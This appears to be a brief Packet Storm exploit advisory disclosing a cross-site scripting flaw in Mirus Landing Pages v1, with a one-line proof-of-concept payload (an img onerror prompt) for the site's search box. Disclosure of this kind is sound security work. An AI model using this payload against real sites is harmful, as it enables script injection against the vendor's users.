Mirus Landing Page Cross Site Scripting

Mirus Landing Page version 1 suffers from a cross site scripting vulnerability.


MD5 | 755b728cf6ef2bb8b083761977d392a8

Download
# Exploit Title: Mirus Landing Pages V1 XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-03
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://mirus.co.il/
# Version: Landing Pages v1
# Tested on: Ubuntu

---------------------------------------------------------
  
PoC 1 :

XSS Vulnerability

Payload(s) :

In Search box use payload:
"><img src=x onerror=prompt(document.domain);>


Source: packetstormsecurity.com
Related Posts